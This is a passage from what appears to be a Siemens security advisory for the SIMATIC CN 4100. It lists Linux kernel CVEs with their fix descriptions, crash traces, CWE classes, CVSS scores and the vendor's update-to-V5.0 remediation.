properly validating the remaining size of the payload before each property access and updating bounds accordingly as properties are parsed. This ensures that property parsing is safely bounded within the received message buffer and protects against malformed or malicious firmware behavior. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38680 In the Linux kernel, the following vulnerability has been resolved: media: uvcvideo: Fix 1-byte out-of-bounds read in uvc_parse_format() The buffer length check before calling uvc_parse_format() only ensured that the buffer has at least 3 bytes (buflen > 2), buf the function accesses buffer[3], requiring at least 4 bytes. This can lead to an out-of-bounds read if the buffer has exactly 3 bytes. Fix it by checking that the buffer has at least 4 bytes in uvc_parse_format(). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38681 In the Linux kernel, the following vulnerability has been resolved: mm/ptdump: take the memory hotplug lock inside ptdump_walk_pgd() Memory hot remove unmaps and tears down various kernel page table regions as required. The ptdump code can race with concurrent modifications of the kernel page tables. When leaf entries are modified concurrently, the dump code may log stale or inconsistent information for a VA range, but this is otherwise not harmful. But when intermediate levels of kernel page table are freed, the dump code will continue to use memory that has been freed and potentially reallocated for another purpose. In such cases, the ptdump code may dereference bogus addresses, leading to a number of potential problems. To avoid the above mentioned race condition, platforms such as arm64, riscv and s390 take memory hotplug lock, while dumping kernel page table via the sysfs interface /sys/kernel/debug/kernel_page_tables. Similar race condition exists while checking for pages that might have been marked W+X via /sys/kernel/debug/kernel_page_tables/check_wx_pages which in turn calls ptdump_check_wx(). Instead of solving this race condition again, let's just move the memory hotplug lock inside generic ptdump_check_wx() which will benefit both the scenarios. Drop get_online_mems() and put_online_mems() combination from all existing platform ptdump code paths. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-366 Race Condition within a Thread Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H CVE-2025-38683 In the Linux kernel, the following vulnerability has been resolved: hv_netvsc: Fix panic during namespace deletion with VF The existing code move the VF NIC to new namespace when NETDEV_REGISTER is received on netvsc NIC. During deletion of the namespace, default_device_exit_batch() >> default_device_exit_net() is called. When netvsc NIC is moved back and registered to the default namespace, it automatically brings VF NIC back to the default namespace. This will cause the default_device_exit_net() >> for_each_netdev_safe loop unable to detect the list end, and hit NULL ptr: [ 231.449420] mana 7870:00:00.0 enP30832s1: Moved VF to namespace with: eth0 [ 231.449656] BUG: kernel NULL pointer dereference, address: 0000000000000010 [ 231.450246] #PF: supervisor read access in kernel mode [ 231.450579] #PF: error_code(0x0000) - not-present page [ 231.450916] PGD 17b8a8067 P4D 0 [ 231.451163] Oops: Oops: 0000 [#1] SMP NOPTI [ 231.451450] CPU: 82 UID: 0 PID: 1394 Comm: kworker/u768:1 Not tainted 6.16.0-rc4+ #3 VOLUNTARY [ 231.452042] Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine, BIOS Hyper-V UEFI Release v4.1 11/21/2024 [ 231.452692] Workqueue: netns cleanup_net [ 231.452947] RIP: 0010:default_device_exit_batch+0x16c/0x3f0 [ 231.453326] Code: c0 0c f5 b3 e8 d5 db fe ff 48 85 c0 74 15 48 c7 c2 f8 fd ca b2 be 10 00 00 00 48 8d 7d c0 e8 7b 77 25 00 49 8b 86 28 01 00 00 <48> 8b 50 10 4c 8b 2a 4c 8d 62 f0 49 83 ed 10 4c 39 e0 0f 84 d6 00 [ 231.454294] RSP: 0018:ff75fc7c9bf9fd00 EFLAGS: 00010246 [ 231.454610] RAX: 0000000000000000 RBX: 0000000000000002 RCX: 61c8864680b583eb [ 231.455094] RDX: ff1fa9f71462d800 RSI: ff75fc7c9bf9fd38 RDI: 0000000030766564 [ 231.455686] RBP: ff75fc7c9bf9fd78 R08: 0000000000000000 R09: 0000000000000000 [ 231.456126] R10: 0000000000000001 R11: 0000000000000004 R12: ff1fa9f70088e340 [ 231.456621] R13: ff1fa9f70088e340 R14: ffffffffb3f50c20 R15: ff1fa9f7103e6340 [ 231.457161] FS: 0000000000000000(0000) GS:ff1faa6783a08000(0000) knlGS:0000000000000000 [ 231.457707] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 231.458031] CR2: 0000000000000010 CR3: 0000000179ab2006 CR4: 0000000000b73ef0 [ 231.458434] Call Trace: [ 231.458600] [ 231.458777] ops_undo_list+0x100/0x220 [ 231.459015] cleanup_net+0x1b8/0x300 [ 231.459285] process_one_work+0x184/0x340 To fix it, move the ns change to a workqueue, and take rtnl_lock to avoid changing the netdev list when default_device_exit_net() is using it. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-820 Missing Synchronization Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.2 MEDIUM CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H CVE-2025-38684 In the Linux kernel, the following vulnerability has been resolved: net/sched: ets: use old 'nbands' while purging unused classes Shuang reported sch_ets test-case [1] crashing in ets_class_qlen_notify() after recent changes from Lion [2]. The problem is: in ets_qdisc_change() we purge unused DWRR queues; the value of 'q->nbands' is the new one, and the cleanup should be done with the old one. The problem is here since my first attempts to fix ets_qdisc_change(), but it surfaced again after the recent qdisc len accounting fixes. Fix it purging idle DWRR queues before assigning a new value of 'q->nbands', so that all purge operations find a consistent configuration: - old 'q->nbands' because it's needed by ets_class_find() - old 'q->nstrict' because it's needed by ets_class_is_strict() BUG: kernel NULL pointer dereference, address: 0000000000000000 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 62 UID: 0 PID: 39457 Comm: tc Kdump: loaded Not tainted 6.12.0-116.el10.x86_64 #1 PREEMPT(voluntary) Hardware name: Dell Inc. PowerEdge R640/06DKY5, BIOS 2.12.2 07/09/2021 RIP: 0010:__list_del_entry_valid_or_report+0x4/0x80 Code: ff 4c 39 c7 0f 84 39 19 8e ff b8 01 00 00 00 c3 cc cc cc cc 66 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa <48> 8b 17 48 8b 4f 08 48 85 d2 0f 84 56 19 8e ff 48 85 c9 0f 84 ab RSP: 0018:ffffba186009f400 EFLAGS: 00010202 RAX: 00000000000000d6 RBX: 0000000000000000 RCX: 0000000000000004 RDX: ffff9f0fa29b69c0 RSI: 0000000000000000 RDI: 0000000000000000 RBP: ffffffffc12c2400 R08: 0000000000000008 R09: 0000000000000004 R10: ffffffffffffffff R11: 0000000000000004 R12: 0000000000000000 R13: ffff9f0f8cfe0000 R14: 0000000000100005 R15: 0000000000000000 FS: 00007f2154f37480(0000) GS:ffff9f269c1c0000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 00000001530be001 CR4: 00000000007726f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 PKRU: 55555554 Call Trace: ets_class_qlen_notify+0x65/0x90 [sch_ets] qdisc_tree_reduce_backlog+0x74/0x110 ets_qdisc_change+0x630/0xa40 [sch_ets] __tc_modify_qdisc.constprop.0+0x216/0x7f0 tc_modify_qdisc+0x7c/0x120 rtnetlink_rcv_msg+0x145/0x3f0 netlink_rcv_skb+0x53/0x100 netlink_unicast+0x245/0x390 netlink_sendmsg+0x21b/0x470 ____sys_sendmsg+0x39d/0x3d0 ___sys_sendmsg+0x9a/0xe0 __sys_sendmsg+0x7a/0xd0 do_syscall_64+0x7d/0x160 entry_SYSCALL_64_after_hwframe+0x76/0x7e RIP: 0033:0x7f2155114084 Code: 89 02 b8 ff ff ff ff eb bb 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 f3 0f 1e fa 80 3d 25 f0 0c 00 00 74 13 b8 2e 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 54 c3 0f 1f 00 48 83 ec 28 89 54 24 1c 48 89 RSP: 002b:00007fff1fd7a988 EFLAGS: 00000202 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 0000560ec063e5e0 RCX: 00007f2155114084 RDX: 0000000000000000 RSI: 00007fff1fd7a9f0 RDI: 0000000000000003 RBP: 00007fff1fd7aa60 R08: 0000000000000010 R09: 000000000000003f R10: 0000560ee9b3a010 R11: 0000000000000202 R12: 00007fff1fd7aae0 R13: 000000006891ccde R14: 0000560ec063e5e0 R15: 00007fff1fd7aad0 [1] https://lore.kernel.org/netdev/e08c7f4a6882f260011909a868311c6e9b54f3e4.1639153474.git.dcaratti@redhat.com/ [2] https://lore.kernel.org/netdev/d912cbd7-193b-4269-9857-525bee8bbb6a@gmail.com/ View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.2 MEDIUM CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H CVE-2025-38685 In the Linux kernel, the following vulnerability has been resolved: fbdev: Fix vmalloc out-of-bounds write in fast_imageblit This issue triggers when a userspace program does an ioctl FBIOPUT_CON2FBMAP by passing console number and frame buffer number. Ideally this maps console to frame buffer and updates the screen if console is visible. As part of mapping it has to do resize of console according to frame buffer info. if this resize fails and returns from vc_do_resize() and continues further. At this point console and new frame buffer are mapped and sets display vars. Despite failure still it continue to proceed updating the screen at later stages where vc_data is related to previous frame buffer and frame buffer info and display vars are mapped to new frame buffer and eventully leading to out-of-bounds write in fast_imageblit(). This bheviour is excepted only when fg_console is equal to requested console which is a visible console and updates screen with invalid struct references in fbcon_putcs(). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38687 In the Linux kernel, the following vulnerability has been resolved: comedi: fix race between polling and detaching syzbot reports a use-after-free in comedi in the below link, which is due to comedi gladly removing the allocated async area even though poll requests are still active on the wait_queue_head inside of it. This can cause a use-after-free when the poll entries are later triggered or removed, as the memory for the wait_queue_head has been freed. We need to check there are no tasks queued on any of the subdevices' wait queues before allowing the device to be detached by the `COMEDI_DEVCONFIG` ioctl. Tasks will read-lock `dev->attach_lock` before adding themselves to the subdevice wait queue, so fix the problem in the `COMEDI_DEVCONFIG` ioctl handler by write-locking `dev->attach_lock` before checking that all of the subdevices are safe to be deleted. This includes testing for any sleepers on the subdevices' wait queues. It remains locked until the device has been detached. This requires the `comedi_device_detach()` function to be refactored slightly, moving the bulk of it into new function `comedi_device_detach_locked()`. Note that the refactor of `comedi_device_detach()` results in `comedi_device_cancel_all()` now being called while `dev->attach_lock` is write-locked, which wasn't the case previously, but that does not matter. Thanks to Jens Axboe for diagnosing the problem and co-developing this patch. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38691 In the Linux kernel, the following vulnerability has been resolved: pNFS: Fix uninited ptr deref in block/scsi layout The error occurs on the third attempt to encode extents. When function ext_tree_prepare_commit() reallocates a larger buffer to retry encoding extents, the "layoutupdate_pages" page array is initialized only after the retry loop. But ext_tree_free_commitdata() is called on every iteration and tries to put pages in the array, thus dereferencing uninitialized pointers. An additional problem is that there is no limit on the maximum possible buffer_size. When there are too many extents, the client may create a layoutcommit that is larger than the maximum possible RPC size accepted by the server. During testing, we observed two typical scenarios. First, one memory page for extents is enough when we work with small files, append data to the end of the file, or preallocate extents before writing. But when we fill a new large file without preallocating, the number of extents can be huge, and counting the number of written extents in ext_tree_encode_commit() does not help much. Since this number increases even more between unlocking and locking of ext_tree, the reallocated buffer may not be large enough again and again. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-908 Use of Uninitialized Resource Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38693 In the Linux kernel, the following vulnerability has been resolved: media: dvb-frontends: w7090p: fix null-ptr-deref in w7090p_tuner_write_serpar and w7090p_tuner_read_serpar In w7090p_tuner_write_serpar, msg is controlled by user. When msg[0].buf is null and msg[0].len is zero, former checks on msg[0].buf would be passed. If accessing msg[0].buf[2] without sanity check, null pointer deref would happen. We add check on msg[0].len to prevent crash. Similar commit: commit 0ed554fd769a ("media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()") View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38694 In the Linux kernel, the following vulnerability has been resolved: media: dvb-frontends: dib7090p: fix null-ptr-deref in dib7090p_rw_on_apb() In dib7090p_rw_on_apb, msg is controlled by user. When msg[0].buf is null and msg[0].len is zero, former checks on msg[0].buf would be passed. If accessing msg[0].buf[2] without sanity check, null pointer deref would happen. We add check on msg[0].len to prevent crash. Similar issue occurs when access msg[1].buf[0] and msg[1].buf[1]. Similar commit: commit 0ed554fd769a ("media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()") View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38695 In the Linux kernel, the following vulnerability has been resolved: scsi: lpfc: Check for hdwq null ptr when cleaning up lpfc_vport structure If a call to lpfc_sli4_read_rev() from lpfc_sli4_hba_setup() fails, the resultant cleanup routine lpfc_sli4_vport_delete_fcp_xri_aborted() may occur before sli4_hba.hdwqs are allocated. This may result in a null pointer dereference when attempting to take the abts_io_buf_list_lock for the first hardware queue. Fix by adding a null ptr check on phba->sli4_hba.hdwq and early return because this situation means there must have been an error during port initialization. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38696 In the Linux kernel, the following vulnerability has been resolved: MIPS: Don't crash in stack_top() for tasks without ABI or vDSO Not all tasks have an ABI associated or vDSO mapped, for example kthreads never do. If such a task ever ends up calling stack_top(), it will derefence the NULL ABI pointer and crash. This can for example happen when using kunit: mips_stack_top+0x28/0xc0 arch_pick_mmap_layout+0x190/0x220 kunit_vm_mmap_init+0xf8/0x138 __kunit_add_resource+0x40/0xa8 kunit_vm_mmap+0x88/0xd8 usercopy_test_init+0xb8/0x240 kunit_try_run_case+0x5c/0x1a8 kunit_generic_run_threadfn_adapter+0x28/0x50 kthread+0x118/0x240 ret_from_kernel_thread+0x14/0x1c Only dereference the ABI point if it is set. The GIC page is also included as it is specific to the vDSO. Also move the randomization adjustment into the same conditional. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38697 In the Linux kernel, the following vulnerability has been resolved: jfs: upper bound check of tree index in dbAllocAG When computing the tree index in dbAllocAG, we never check if we are out of bounds realative to the size of the stree. This could happen in a scenario where the filesystem metadata are corrupted. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38698 In the Linux kernel, the following vulnerability has been resolved: jfs: Regular file corruption check The reproducer builds a corrupted file on disk with a negative i_size value. Add a check when opening this file to avoid subsequent operation failures. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38699 In the Linux kernel, the following vulnerability has been resolved: scsi: bfa: Double-free fix When the bfad_im_probe() function fails during initialization, the memory pointed to by bfad->im is freed without setting bfad->im to NULL. Subsequently, during driver uninstallation, when the state machine enters the bfad_sm_stopping state and calls the bfad_im_probe_undo() function, it attempts to free the memory pointed to by bfad->im again, thereby triggering a double-free vulnerability. Set bfad->im to NULL if probing fails. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-415 Double Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.4 MEDIUM CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H CVE-2025-38700 In the Linux kernel, the following vulnerability has been resolved: scsi: libiscsi: Initialize iscsi_conn->dd_data only if memory is allocated In case of an ib_fast_reg_mr allocation failure during iSER setup, the machine hits a panic because iscsi_conn->dd_data is initialized unconditionally, even when no memory is allocated (dd_size == 0). This leads invalid pointer dereference during connection teardown. Fix by setting iscsi_conn->dd_data only if memory is actually allocated. Panic trace: ------------ iser: iser_create_fastreg_desc: Failed to allocate ib_fast_reg_mr err=-12 iser: iser_alloc_rx_descriptors: failed allocating rx descriptors / data buffers BUG: unable to handle page fault for address: fffffffffffffff8 RIP: 0010:swake_up_locked.part.5+0xa/0x40 Call Trace: complete+0x31/0x40 iscsi_iser_conn_stop+0x88/0xb0 [ib_iser] iscsi_stop_conn+0x66/0xc0 [scsi_transport_iscsi] iscsi_if_stop_conn+0x14a/0x150 [scsi_transport_iscsi] iscsi_if_rx+0x1135/0x1834 [scsi_transport_iscsi] ? netlink_lookup+0x12f/0x1b0 ? netlink_deliver_tap+0x2c/0x200 netlink_unicast+0x1ab/0x280 netlink_sendmsg+0x257/0x4f0 ? _copy_from_user+0x29/0x60 sock_sendmsg+0x5f/0x70 View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38701 In the Linux kernel, the following vulnerability has been resolved: ext4: do not BUG when INLINE_DATA_FL lacks system.data xattr A syzbot fuzzed image triggered a BUG_ON in ext4_update_inline_data() when an inode had the INLINE_DATA_FL flag set but was missing the system.data extended attribute. Since this can happen due to a maiciouly fuzzed file system, we shouldn't BUG, but rather, report it as a corrupted file system. Add similar replacements of BUG_ON with EXT4_ERROR_INODE() ii ext4_create_inline_data() and ext4_inline_data_truncate(). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-617 Reachable Assertion Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38702 In the Linux kernel, the following vulnerability has been resolved: fbdev: fix potential buffer overflow in do_register_framebuffer() The current implementation may lead to buffer overflow when: 1. Unregistration creates NULL gaps in registered_fb[] 2. All array slots become occupied despite num_registered_fb < FB_MAX 3. The registration loop exceeds array bounds Add boundary check to prevent registered_fb[FB_MAX] access. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38706 In the Linux kernel, the following vulnerability has been resolved: ASoC: core: Check for rtd == NULL in snd_soc_remove_pcm_runtime() snd_soc_remove_pcm_runtime() might be called with rtd == NULL which will leads to null pointer dereference. This was reproduced with topology loading and marking a link as ignore due to missing hardware component on the system. On module removal the soc_tplg_remove_link() would call snd_soc_remove_pcm_runtime() with rtd == NULL since the link was ignored, no runtime was created. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38707 In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Add sanity check for file name The length of the file name should be smaller than the directory entry size. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38708 In the Linux kernel, the following vulnerability has been resolved: drbd: add missing kref_get in handle_write_conflicts With `two-primaries` enabled, DRBD tries to detect "concurrent" writes and handle write conflicts, so that even if you write to the same sector simultaneously on both nodes, they end up with the identical data once the writes are completed. In handling "superseeded" writes, we forgot a kref_get, resulting in a premature drbd_destroy_device and use after free, and further to kernel crashes with symptoms. Relevance: No one should use DRBD as a random data generator, and apparently all users of "two-primaries" handle concurrent writes correctly on layer up. That is cluster file systems use some distributed lock manager, and live migration in virtualization environments stops writes on one node before starting writes on the other node. Which means that other than for "test cases", this code path is never taken in real life. FYI, in DRBD 9, things are handled differently nowadays. We still detect "write conflicts", but no longer try to be smart about them. We decided to disconnect hard instead: upper layers must not submit concurrent writes. If they do, that's their fault. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38711 In the Linux kernel, the following vulnerability has been resolved: smb/server: avoid deadlock when linking with ReplaceIfExists If smb2_create_link() is called with ReplaceIfExists set and the name does exist then a deadlock will happen. ksmbd_vfs_kern_path_locked() will return with success and the parent directory will be locked. ksmbd_vfs_remove_file() will then remove the file. ksmbd_vfs_link() will then be called while the parent is still locked. It will try to lock the same parent and will deadlock. This patch moves the ksmbd_vfs_kern_path_unlock() call to *before* ksmbd_vfs_link() and then simplifies the code, removing the file_present flag variable. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38712 In the Linux kernel, the following vulnerability has been resolved: hfsplus: don't use BUG_ON() in hfsplus_create_attributes_file() When the volume header contains erroneous values that do not reflect the actual state of the filesystem, hfsplus_fill_super() assumes that the attributes file is not yet created, which later results in hitting BUG_ON() when hfsplus_create_attributes_file() is called. Replace this BUG_ON() with -EIO error with a message to suggest running fsck tool. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38713 In the Linux kernel, the following vulnerability has been resolved: hfsplus: fix slab-out-of-bounds read in hfsplus_uni2asc() The hfsplus_readdir() method is capable to crash by calling hfsplus_uni2asc(): [ 667.121659][ T9805] ================================================================== [ 667.122651][ T9805] BUG: KASAN: slab-out-of-bounds in hfsplus_uni2asc+0x902/0xa10 [ 667.123627][ T9805] Read of size 2 at addr ffff88802592f40c by task repro/9805 [ 667.124578][ T9805] [ 667.124876][ T9805] CPU: 3 UID: 0 PID: 9805 Comm: repro Not tainted 6.16.0-rc3 #1 PREEMPT(full) [ 667.124886][ T9805] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 667.124890][ T9805] Call Trace: [ 667.124893][ T9805] [ 667.124896][ T9805] dump_stack_lvl+0x10e/0x1f0 [ 667.124911][ T9805] print_report+0xd0/0x660 [ 667.124920][ T9805] ? __virt_addr_valid+0x81/0x610 [ 667.124928][ T9805] ? __phys_addr+0xe8/0x180 [ 667.124934][ T9805] ? hfsplus_uni2asc+0x902/0xa10 [ 667.124942][ T9805] kasan_report+0xc6/0x100 [ 667.124950][ T9805] ? hfsplus_uni2asc+0x902/0xa10 [ 667.124959][ T9805] hfsplus_uni2asc+0x902/0xa10 [ 667.124966][ T9805] ? hfsplus_bnode_read+0x14b/0x360 [ 667.124974][ T9805] hfsplus_readdir+0x845/0xfc0 [ 667.124984][ T9805] ? __pfx_hfsplus_readdir+0x10/0x10 [ 667.124994][ T9805] ? stack_trace_save+0x8e/0xc0 [ 667.125008][ T9805] ? iterate_dir+0x18b/0xb20 [ 667.125015][ T9805] ? trace_lock_acquire+0x85/0xd0 [ 667.125022][ T9805] ? lock_acquire+0x30/0x80 [ 667.125029][ T9805] ? iterate_dir+0x18b/0xb20 [ 667.125037][ T9805] ? down_read_killable+0x1ed/0x4c0 [ 667.125044][ T9805] ? putname+0x154/0x1a0 [ 667.125051][ T9805] ? __pfx_down_read_killable+0x10/0x10 [ 667.125058][ T9805] ? apparmor_file_permission+0x239/0x3e0 [ 667.125069][ T9805] iterate_dir+0x296/0xb20 [ 667.125076][ T9805] __x64_sys_getdents64+0x13c/0x2c0 [ 667.125084][ T9805] ? __pfx___x64_sys_getdents64+0x10/0x10 [ 667.125091][ T9805] ? __x64_sys_openat+0x141/0x200 [ 667.125126][ T9805] ? __pfx_filldir64+0x10/0x10 [ 667.125134][ T9805] ? 